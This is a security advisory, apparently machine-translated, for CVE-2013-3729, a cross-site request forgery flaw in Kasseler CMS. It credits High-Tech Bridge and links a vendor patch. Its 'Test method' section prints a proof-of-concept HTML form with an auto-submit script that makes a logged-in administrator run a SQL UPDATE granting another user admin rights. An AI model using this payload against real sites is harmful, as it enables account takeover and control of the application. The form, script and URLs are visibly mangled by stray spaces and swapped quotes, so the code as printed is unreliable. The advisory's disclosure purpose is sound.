Kasseler CMS Cross-Site Request Forgery Vulnerability

Released on: 2013-07-03
Updated on:

Affected Systems:
Kasseler CMS <= 2 r1223
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60929
CVE (CAN) ID: CVE-2013-3729

Kasseler CMS is a content management system.

Kasseler CMS has the Cross-Site Request Forgery Vulnerability, which is due to the lack of CSRF protection mechanism in the entire application. Remote attackers can trick logged-on administrators into visiting specially crafted web pages with CSRF exploitation code. This vulnerability can be exploited to execute arbitrary SQL queries in the application database and completely control the application.

<* Source: High-Tech Bridge Security Research Lab

Link: https://www.htbridge.com/advisory/HTB23158
Http://seclists.org/bugtraq/2013/Jul/26
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<Form action = "http: // [host]/admin. php? Module = database & do = SQL _query "method =" post "name =" main ">
<Input type = "hidden" name = "query" value = "UPDATE 'kasseler '. 'kasseler _ users' SET 'user _ level' = '2', 'user _ group' =
'1' WHERE 'kasseler _ users'. 'uid' = 2 LIMIT 1; ">
<Input type = "submit" id = "btn">
</Form>
<Script>
Document. main. submit ();
</Script>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Kasseler CMS
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://diff.kasseler-cms.net/svn/patches/1232.html